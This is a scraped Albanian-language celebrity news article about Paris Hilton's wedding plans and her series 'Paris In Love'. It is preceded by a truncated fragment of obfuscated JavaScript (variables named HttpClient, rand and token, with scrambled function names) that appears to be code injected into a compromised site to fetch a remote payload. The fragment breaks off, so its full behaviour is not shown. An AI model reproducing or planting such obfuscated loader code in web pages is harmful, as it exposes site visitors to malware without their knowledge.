;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Paris Hilton zbulon se ka gjetur “Përfundimin e lumtur të përrallës”!

By

Paris Hilton deklaroi se do të fusë kamera në përgaditjet e saj të dasmës për t’u treguar fansave se ka gjetur ‘Përfundimin e lumtur të përrallës’.

“Unë thjesht dua që fansat e mi të shikonin se gjeta princin tim simpatik”.

Paris Hilton ka treguar disa ide mbi planet e saj të dasmës pas fejeses në shkurt me sipërmarrësin Carter Reum.

Në muajin maj u zbulua se çifti-i cili u takua një vit para se të fejohenin, ndërsa festonin ditëlindjen e 40-të, të Paris në një ishull privat.

Sipas një njoftimi për shtyp, seriali – i titulluar “Paris In Love” do të dokumentojë përgatitjet e çiftit, si dhe vetë ditën e madhe të tyre.

“Shikuesit do të jenë së bashku për një udhëtim argëtues dhe emocional dhe do të dëshmojnë një anë personale të Parisit që vetëm miqtë dhe familja e saj më e ngushtë mund ta shohin.

Tani Parisi po zbulon pse po i lejon kamerat të kapin ditën e saj të dasmës, duke shpjeguar se ajo dëshiron t’i japë historisë së saj një fund të lumtur.

Gjatë një interviste në “The Tonight Show” ajo tha se ceremonia e saj e dasmës do të jetë një festë e gjithanshme e dashurisë.

“Unë patjetër do të marr një DJ-do të kemi edhe një grup,” zbuloi Paris në “The Tonight Show”. . “Do të jetë, si një dasëm tre-ditore, kështu që do të kemi shumë gjëra”.

“Shumë fustane – ndoshta 10. Më pëlqejnë ndryshimet e veshjeve”. /Prive.al

Artikuj të ngjashëm